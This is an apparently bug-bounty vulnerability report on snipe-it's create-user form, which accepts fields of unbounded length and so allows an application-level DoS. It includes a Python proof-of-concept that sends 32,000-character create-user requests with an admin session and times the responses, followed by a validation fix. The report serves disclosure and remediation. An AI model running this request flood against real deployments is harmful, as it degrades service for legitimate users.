Able to create a user with a long password as well as a long username in snipe/snipe-it
Reported on
May 12th 2022
Issue Description:
Any administrator can create user accounts and assign their credentials. The create-user form enforces no length limit on the first name, last name, username and password fields, so values of arbitrary length are accepted and stored. This can be used to cause an application-level DoS against snipe-it.
What is an application-level DoS?
An application-level DoS attack targets the code that builds a response to an ordinary HTTP request rather than the network. A single request may be small, but the work the server must do to handle it can be many times larger. A threat actor therefore floods the server with such requests until it can no longer answer legitimate requests in any practical time. Typical targets are website forms (login, photo/video upload, feedback submission, and so on).
Steps to Reproduce:
- Log in as an administrator and open the create-user page.
- Generate a random string of 32,000 characters with the following tool.
- Paste the string into the first name, last name and password fields (the username is not limited either) and click Create User. The user is created with the 32k-character values: no length limit is enforced and the submitted values are not checked. Repeating this request consumes server resources and leads to an application-level DoS.
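The request the steps above describe, as an added example that is not part of the original report or of snipe-it. It builds the create-user form with a 32,000-character value in every free-text field and, given a target, posts it and reports the status and response time so a normal-sized submission can be compared against the oversized one. The form field names (`first_name`, `last_name`, `username`, `password`, `password_confirmation`, Laravel's `_token`), the `/users` path and the content type are assumptions about the form, not taken from the report; the session cookie and CSRF token must be copied from a logged-in admin browser session.

```python
"""Oversized create-user request builder (added example, not part of the
original report or of snipe-it).

Assumptions not confirmed by the report: the form posts to <base>/users as
application/x-www-form-urlencoded with the fields first_name, last_name,
username, password and password_confirmation plus Laravel's _token CSRF
field; the caller supplies an authenticated admin session cookie and a
CSRF token copied from the rendered form."""
from __future__ import annotations

import secrets
import string
import sys
import time
import urllib.error
import urllib.request
from urllib.parse import urlencode

OVERSIZED = 32_000  # length used in the reproduction steps above
TEXT_FIELDS = ("first_name", "last_name", "username")


def random_string(length: int) -> str:
    """Random alphanumeric string of exactly `length` characters."""
    alphabet = string.ascii_letters + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(length))


def build_user_form(length: int, csrf_token: str) -> dict[str, str]:
    """Fill every free-text field with a value of `length` characters.

    The password is copied into password_confirmation so the form's own
    confirmation check does not reject the request before the missing
    length check is reached."""
    fields = {name: random_string(length) for name in TEXT_FIELDS}
    password = random_string(length)
    fields["password"] = password
    fields["password_confirmation"] = password
    fields["_token"] = csrf_token
    return fields


def encode_form(fields: dict[str, str]) -> bytes:
    """URL-encode the form the way a browser submission would."""
    return urlencode(fields).encode("ascii")


def post_user(base_url: str, session_cookie: str, body: bytes,
              timeout: float = 120.0) -> tuple[int, float]:
    """POST the encoded form; return (HTTP status, seconds until response).

    The elapsed time is what to compare against a normal-sized submission:
    the gap is the per-request cost the attacker is amplifying."""
    req = urllib.request.Request(base_url.rstrip("/") + "/users",
                                 data=body, method="POST")
    req.add_header("Content-Type", "application/x-www-form-urlencoded")
    req.add_header("Cookie", session_cookie)
    started = time.perf_counter()
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            status = resp.status
    except urllib.error.HTTPError as err:  # 4xx/5xx still carry a status
        status = err.code
    return status, time.perf_counter() - started


if __name__ == "__main__":
    if len(sys.argv) != 4:
        sys.exit(f"usage: {sys.argv[0]} <base_url> <session_cookie> <csrf_token>")
    base_url, cookie, token = sys.argv[1:]
    for length in (8, OVERSIZED):  # baseline first, then the oversized request
        body = encode_form(build_user_form(length, token))
        status, elapsed = post_user(base_url, cookie, body)
        print(f"{length:>6} chars/field, {len(body):>7} bytes "
              f"-> HTTP {status} in {elapsed:.2f}s")
```

Run it once against a test instance you own; a successful creation answers with a redirect (followed by urllib), and a 419 means the CSRF token did not match the session.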
Impact
The create-user endpoint accepts first name, last name, username and password values of unbounded length (32,000 characters in the reproduction). Every such request makes the server validate, hash, store and later render far more data than a legitimate request, and each stored record carries that cost into every page that loads the user afterwards. An attacker holding an admin session can submit these requests in a loop, consuming memory, CPU and database capacity until the application can no longer answer legitimate requests in any practical time, which is an application-level DoS.
Occurrences
UsersCest.php L48-L87
Suggested Fix
Add a maximum-length validation rule (at most 500 characters) to every input field of the create-user form, so that oversized values are rejected before they are processed or stored.
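What the suggested rule has to guarantee, as an added example that is not snipe-it's code (the project is PHP/Laravel; this is a stand-alone Python model of the check). Every free-text field is bounded, and the length check runs before any further processing such as password hashing or the database insert, so an oversized request is rejected cheaply instead of being accepted and stored. The limit of 500 follows the suggestion above; the field names, the error wording and the PBKDF2 stand-in for the real password hash are assumptions for illustration.

```python
"""Length check in front of a create-user handler (added example; not
snipe-it's code). MAX_FIELD_LENGTH, the field names, the error wording and
the PBKDF2 stand-in for the real password hash are assumptions."""
from __future__ import annotations

import hashlib
import os

MAX_FIELD_LENGTH = 500  # limit suggested in the report
TEXT_FIELDS = ("first_name", "last_name", "username", "password")


def validate_lengths(fields: dict[str, str],
                     max_len: int = MAX_FIELD_LENGTH) -> dict[str, str]:
    """Return one error per over-long field (empty dict means all fields fit).

    Lengths are counted in characters, as Laravel's max: rule does, so the
    database column must hold at least max_len characters in its charset."""
    errors: dict[str, str] = {}
    for name in TEXT_FIELDS:
        value = fields.get(name, "")
        if len(value) > max_len:
            errors[name] = (f"The {name.replace('_', ' ')} may not be "
                            f"greater than {max_len} characters.")
    return errors


def hash_password(password: str, iterations: int = 200_000) -> bytes:
    """Deliberately slow hash standing in for the application's password
    hash; with the length check missing this work runs for every request."""
    salt = os.urandom(16)
    return salt + hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                      salt, iterations)


def create_user(fields: dict[str, str]) -> tuple[dict | None, dict[str, str]]:
    """Validate first, hash and build the record only on success.

    Returns (user_record, errors); on failure the record is None and nothing
    has been hashed or stored."""
    errors = validate_lengths(fields)
    if fields.get("password") != fields.get("password_confirmation"):
        errors["password"] = "The password confirmation does not match."
    if errors:
        return None, errors
    record = {name: fields[name]
              for name in ("first_name", "last_name", "username")}
    record["password"] = hash_password(fields["password"])
    return record, {}
```

The same ordering applies in the real application: the framework validator runs before the controller touches the model, so putting the limit in the validation rules rather than in the view is what makes the rejection cheap.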